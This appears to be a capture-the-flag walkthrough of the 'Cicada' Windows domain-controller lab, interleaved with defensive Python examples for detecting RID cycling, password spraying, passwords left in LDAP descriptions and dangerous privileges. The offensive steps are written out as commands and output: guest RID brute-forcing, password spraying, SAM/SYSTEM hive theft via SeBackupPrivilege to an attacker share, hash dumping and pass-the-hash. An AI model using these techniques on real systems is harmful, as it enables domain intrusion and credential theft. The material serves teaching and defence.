Windows - Easy - Cicada

Recon

A default nmap TCP scan returns nothing, so here is a full port scan (-p-) with service and OS detection:

$ sudo nmap -p- -A 10.129.231.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-28 08:49 UTC
Nmap scan report for 10.129.231.149
Host is up (0.048s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-28 15:51:27Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
60281/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (89%)
Aggressive OS guesses: Microsoft Windows Server 2022 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time: 
|   date: 2024-11-28T15:52:30
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   32.09 ms 10.10.16.1
2   64.41 ms 10.129.231.149

Starting with SMB, we can find two non-default shares, DEV and HR.

We cannot access the DEV share anonymously, but we can access HR. In there we find a welcome message from HR with some interesting content:

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

We cannot enumerate users using rpcclient.

$ rpcclient -U "" 10.129.126.15
Password for [WORKGROUP\]:
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

The same is true for windapsearch.

$ ./windapsearch.py --dc-ip 10.129.126.15 -u "" -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.126.15
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=cicada,DC=htb
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users
[!] Error retrieving users
[!] {'msgtype': 101, 'msgid': 3, 'result': 1, 'desc': 'Operations error', 'ctrls': [], 'info': '000004DC: LdapErr: DSID-0C090C78, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c'}

Running netexec with the Guest account and an empty password finally got me something:

nxc smb 10.129.126.15 -u guest -p '' --rid-brute
SMB         10.129.126.15   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.126.15   445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.126.15   445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.129.126.15   445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

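The RID cycling above only works because the Guest account is enabled and allowed to translate SIDs to names; disabling Guest and the "Network access: Allow anonymous SID/Name translation" policy closes it. As an added example (not part of the original writeup), the following parser turns netexec's --rid-brute lines into records, summarises what a guest session could learn, and derives the list of human user accounts, which is the users.txt list built by hand below. The sample output is a constructed subset of the lines shown above.

```python
from __future__ import annotations
import re

# Constructed sample: a subset of the --rid-brute lines shown above, in the
# format netexec prints them (the real run lists every group as well).
SAMPLE_RID_OUTPUT = """\
SMB         10.129.126.15   445    CICADA-DC        [+] cicada.htb\\guest:
SMB         10.129.126.15   445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1105: CICADA\\sarah.dantelia (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1106: CICADA\\michael.wrightson (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1108: CICADA\\david.orelious (SidTypeUser)
SMB         10.129.126.15   445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
SMB         10.129.126.15   445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)
"""

# Layout of a resolved line: protocol, IP, port, hostname, "<rid>: <DOMAIN>\<name> (<SidType>)"
RID_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+(?P<rid>\d+):\s+(?P<domain>[^\\]+)\\(?P<name>.+?)\s+\((?P<kind>\w+)\)\s*$"
)


def parse_rid_brute(output: str) -> list[dict]:
    """One record per resolved RID: {'rid': int, 'name': str, 'kind': str}."""
    records = []
    for line in output.splitlines():
        m = RID_LINE.match(line)
        if m:
            records.append({"rid": int(m["rid"]), "name": m["name"], "kind": m["kind"]})
    return records


def candidate_users(records: list[dict], include_builtin: bool = True) -> list[str]:
    """User accounts that could still carry a human-set (or default) password.

    Machine accounts (trailing '$') are skipped: their passwords are random and
    rotated automatically. With include_builtin=False the well-known RIDs below
    1000 (Administrator, Guest, krbtgt) are skipped as well.
    """
    users = []
    for rec in records:
        if rec["kind"] != "SidTypeUser" or rec["name"].endswith("$"):
            continue
        if not include_builtin and rec["rid"] < 1000:
            continue
        users.append(rec["name"])
    return users


def exposure_summary(records: list[dict]) -> dict[str, int]:
    """How much an unauthenticated guest session learned: object counts per SID type."""
    summary: dict[str, int] = {}
    for rec in records:
        summary[rec["kind"]] = summary.get(rec["kind"], 0) + 1
    return summary


if __name__ == "__main__":
    recs = parse_rid_brute(SAMPLE_RID_OUTPUT)
    print(exposure_summary(recs))
    print("\n".join(candidate_users(recs)))
```

Feeding the full netexec output into parse_rid_brute and writing candidate_users to a file reproduces the hand-made users.txt; for a defender the same summary is a quick measure of how much directory structure a guest session leaks.
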
We can now look for the new hire who still has the default password. I've created a file users.txt with the following contents:

Administrator
Guest
krbtgt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

and then spray the default password over all of them with crackmapexec smb 10.129.126.15 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'.

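From the domain controller's side, the spray above is one source address producing a failed logon (event 4625) for almost every account within a couple of seconds, one attempt each, which is exactly the pattern per-account lockout does not catch. As an added example (not from the writeup), here is the detection logic over constructed sample events: the flat one-line layout is ours for the example, not the Security log's XML, and the timestamps and source addresses are made up to mirror the spray on this box.

```python
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: simplified failed-logon (4625) and successful-logon (4624)
# records, one per line: time, event id, target account, source IP, NTSTATUS.
# 0xC000006A is STATUS_WRONG_PASSWORD. The 4624 lines are there to show they are ignored.
SAMPLE_EVENTS = """\
2024-11-28T15:55:01Z 4625 Administrator 10.10.16.9 0xC000006A
2024-11-28T15:55:01Z 4625 Guest 10.10.16.9 0xC000006A
2024-11-28T15:55:01Z 4625 krbtgt 10.10.16.9 0xC000006A
2024-11-28T15:55:02Z 4625 john.smoulder 10.10.16.9 0xC000006A
2024-11-28T15:55:02Z 4625 sarah.dantelia 10.10.16.9 0xC000006A
2024-11-28T15:55:02Z 4624 michael.wrightson 10.10.16.9 0x0
2024-11-28T15:55:03Z 4625 david.orelious 10.10.16.9 0xC000006A
2024-11-28T15:55:03Z 4625 emily.oscars 10.10.16.9 0xC000006A
2024-11-28T09:12:40Z 4625 sarah.dantelia 10.129.126.50 0xC000006A
2024-11-28T09:13:05Z 4625 sarah.dantelia 10.129.126.50 0xC000006A
2024-11-28T09:13:31Z 4624 sarah.dantelia 10.129.126.50 0x0
"""


def parse_events(text: str) -> list[dict]:
    """Keep only the 4625 failures; everything else is dropped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, event_id, user, ip, status = line.split()
        if event_id != "4625":
            continue
        events.append({
            "time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"),
            "user": user.lower(),
            "ip": ip,
            "status": status,
        })
    return events


def detect_spray(events: list[dict], window_seconds: int = 60, min_accounts: int = 5) -> list[dict]:
    """Flag each source IP whose failures hit min_accounts distinct accounts inside one window.

    A spray is few attempts per account across many accounts, so it never trips
    per-account lockout; counting distinct targets per source is what catches it.
    A single user mistyping their own password several times is not flagged.
    """
    by_ip: dict[str, list[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_ip[ev["ip"]].append(ev)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for ip, evs in by_ip.items():
        start = 0
        best: set[str] = set()
        # Sliding window over this source's failures, oldest to newest.
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            accounts = {e["user"] for e in evs[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            alerts.append({
                "ip": ip,
                "accounts": sorted(best),
                "failures": len(evs),
                "first_failure": evs[0]["time"].isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The thresholds are deliberately low for the example; in production the window and account count are tuned to the environment, and the successful 4624 from the same source right in the middle of the burst is the line worth correlating, since it names the account whose password was guessed.
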
Time to get in as michael.wrightson. Logging in to the DEV share over SMB with this user didn't allow us to do anything either. It does, however, let us dump the whole LDAP directory with ldapdomaindump -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.129.126.15 -o dump. Looking for passwords within the dump with cat ./* | grep password, we find "Just in case I forget my password is aRt$Lp#7t*VQ!3" in the description of user david.orelious. With his credentials we finally get into DEV.

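The description attribute is readable by every authenticated domain user, so a password stored there is effectively shared with the whole domain. The grep above finds the literal word "password"; as an added example (not part of the writeup), this audit goes a little further and also flags password-shaped tokens and the other free-text attributes (info, comment). It reads records in the shape ldapdomaindump writes to domain_users.json (a list of objects with an "attributes" dict of lists); the sample below is constructed, with the david.orelious description taken from the box and the other accounts and notes made up.

```python
from __future__ import annotations
import json
import re

# Constructed sample in the shape of ldapdomaindump's domain_users.json.
# The david.orelious description is the one found on the box; the svc_sql
# account and the notes on the other users are made up for the example.
SAMPLE_DOMAIN_USERS = json.dumps([
    {"attributes": {"sAMAccountName": ["david.orelious"],
                    "description": ["Just in case I forget my password is aRt$Lp#7t*VQ!3"]}},
    {"attributes": {"sAMAccountName": ["emily.oscars"], "description": ["Backup operator"]}},
    {"attributes": {"sAMAccountName": ["svc_sql"], "description": ["pwd: Winter2024!"]}},
    {"attributes": {"sAMAccountName": ["john.smoulder"], "description": []}},
    {"attributes": {"sAMAccountName": ["michael.wrightson"], "description": ["Passport office liaison"]}},
    {"attributes": {"sAMAccountName": ["sarah.dantelia"], "info": ["temp pass: Spring2024$$"]}},
])

# Words that usually precede a stored credential. "passport" does not match:
# the \b after pass/password/passwd requires the word to end there.
SECRET_WORDS = re.compile(r"\b(?:pass(?:word|wd)?|pwd|secret|credentials?|creds?)\b", re.I)

CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def looks_like_secret(token: str) -> bool:
    """A token of 8+ characters drawn from at least three character classes."""
    if len(token) < 8:
        return False
    classes = sum(1 for pattern in CHARACTER_CLASSES if re.search(pattern, token))
    return classes >= 3


def audit_descriptions(json_text: str, fields=("description", "info", "comment")) -> list[dict]:
    """Return one finding per free-text attribute value that looks like it holds a credential."""
    findings = []
    for obj in json.loads(json_text):
        attrs = obj.get("attributes", {})
        name = (attrs.get("sAMAccountName") or ["<unknown>"])[0]
        for field in fields:
            for value in attrs.get(field, []):
                reasons = []
                if SECRET_WORDS.search(value):
                    reasons.append("credential keyword")
                if any(looks_like_secret(tok) for tok in value.split()):
                    reasons.append("password-like token")
                if reasons:
                    findings.append({"user": name, "field": field, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_descriptions(SAMPLE_DOMAIN_USERS):
        print(f"{finding['user']}.{finding['field']}: {finding['reasons']}")
```

Run periodically against a fresh dump it catches the notes helpdesk staff leave "just in case"; each hit should be cleared from the attribute and the password rotated, because a description is never confidential in AD.
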
Contents of Backup_script.ps1:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Another user and password: emily.oscars : Q!3@Lp#M6b*7t*Vt. This one can finally log in via WinRM, so we are in:

evil-winrm -i 10.129.126.15 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Priv esc

whoami /priv shows that emily.oscars holds quite a few privileges. We can definitely abuse SeBackupPrivilege for escalation.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

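SeBackupPrivilege and SeRestorePrivilege together bypass file and registry ACLs in both directions, so any account that holds them (typically through Backup Operators membership) should be treated as a local administrator and reviewed as such. As an added example (not from the writeup), this small parser reads whoami /priv output and flags the privileges that are generally recognised as admin-equivalent; the input is the output shown above, and the set of flagged privileges and the one-line reasons are my own summary of Microsoft's privilege documentation, not something the box exposes.

```python
from __future__ import annotations

# Constructed input: the whoami /priv output shown above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# Privileges whose holder can read or write data that ACLs would otherwise deny,
# and which are therefore equivalent to local administrator when misassigned.
ESCALATION_PRIVILEGES = {
    "SeBackupPrivilege": "read any file regardless of its ACL (registry hives included)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including protected system processes",
    "SeImpersonatePrivilege": "impersonate any client that connects to the process",
    "SeAssignPrimaryTokenPrivilege": "assign an arbitrary primary token to a process",
    "SeLoadDriverPrivilege": "load kernel-mode code",
    "SeTcbPrivilege": "act as part of the operating system",
}


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Map privilege name to its State column.

    Column widths vary (a 29-character name leaves only one space before the
    description), so split on whitespace and take the first and last fields.
    """
    privs: dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not (parts[0].startswith("Se") and parts[0].endswith("Privilege")):
            continue
        privs[parts[0]] = parts[-1]
    return privs


def flag_privileges(privs: dict[str, str]) -> list[dict]:
    """Held privileges that are admin-equivalent.

    The State column is reported but not used to filter: a 'Disabled' privilege
    is still held by the token and can be enabled by the process that owns it.
    """
    return [
        {"name": name, "state": state, "why": ESCALATION_PRIVILEGES[name]}
        for name, state in privs.items()
        if name in ESCALATION_PRIVILEGES
    ]


if __name__ == "__main__":
    for flagged in flag_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{flagged['name']} ({flagged['state']}): {flagged['why']}")
```

The useful defensive follow-up is the group review: on a domain controller the members of Backup Operators get exactly these two privileges on the DC itself, which is why a backup account there is worth as much as a Domain Admin.
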
We can then create an SMB share on our machine and connect to it from Windows using net use \\10.10.16.9\shared. In C:\Temp we save the SAM and SYSTEM registry hives, then transfer the files back to our shared folder.

On Windows:
reg save hklm\sam C:\temp\sam.hive
reg save hklm\system C:\temp\system.hive
cp C:\temp\* .\

On Linux:
/usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL

Then we get:

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

By passing the hash, we are in!
evil-winrm -i 10.129.126.15 -u "Administrator" -H 2b87e7c93a3e8a0ea4a581937016f341